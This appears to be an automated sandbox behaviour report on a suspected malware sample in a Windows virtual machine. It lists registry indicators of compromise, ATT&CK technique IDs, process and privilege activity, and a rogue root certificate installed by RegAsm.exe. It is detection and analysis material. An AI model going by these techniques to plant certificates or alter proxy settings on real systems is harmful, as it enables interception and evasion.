Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1608 tasklist.exe
5048 tasklist.exe

pid	process
1608	tasklist.exe
5048	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 63 IoCs

Processes:

ITSMService.exemsiexec.exesvchost.exechrome.exepython_x86_Lib.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	ITSMService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	ITSMService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	ITSMService.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133626621591691923"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ITSMService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	python_x86_Lib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	python_x86_Lib.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ITSMService.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000008ede0b15b5bcda01	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ITSMService.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000004c051315b5bcda01	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	python_x86_Lib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	python_x86_Lib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	python_x86_Lib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	ITSMService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ITSMService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	ITSMService.exe

Modifies registry class 28 IoCs

Processes:

msiexec.exeITSMService.exechrome.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CDM	ITSMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03E5B6ACB616E5A4CB0225268956CCA0\DefaultFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Version = "134527975"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\em_6hvuwiqE_installer_Win7-Win11_x86_x64\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CDM\proxy = "false"	ITSMService.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\PackageCode = "DFFE6588FCABA52429605389FCB2DC8B"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Language = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductIcon = "C:\\Windows\\Installer\\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\\icon.ico"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductName = "Endpoint Manager Communication Client"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\PackageName = "em_6hvuwiqE_installer_Win7-Win11_x86_x64.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\em_6hvuwiqE_installer_Win7-Win11_x86_x64\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\AdvertiseFlags = "388"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductName = "Endpoint Manager Test"	ITSMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\03E5B6ACB616E5A4CB0225268956CCA0	msiexec.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5024 PING.EXE
Suspicious behavior: AddClipboardFormatListener 5 IoCs

Processes:

ITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeITSMAgent.exe

pid process

2516 ITSMAgent.exe
2896 ITSMAgent.exe
2948 ITSMAgent.exe
3432 ITSMAgent.exe
2800 ITSMAgent.exe

pid	process
5024	PING.EXE

pid	process
2516	ITSMAgent.exe
2896	ITSMAgent.exe
2948	ITSMAgent.exe
3432	ITSMAgent.exe
2800	ITSMAgent.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

chrome.exechrome.exeBlind.pifpowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exemsiexec.exeITSMService.exe

pid	process
4412	chrome.exe
4412	chrome.exe
4616	chrome.exe
4616	chrome.exe
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2992	Blind.pif
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
4136	RegAsm.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
4136	RegAsm.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
4564	msiexec.exe
4564	msiexec.exe
2688	powershell.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

4412 chrome.exe
4412 chrome.exe
4412 chrome.exe
4412 chrome.exe
4412 chrome.exe
4412 chrome.exe
4412 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe
Token: SeShutdownPrivilege	4412	chrome.exe
Token: SeCreatePagefilePrivilege	4412	chrome.exe

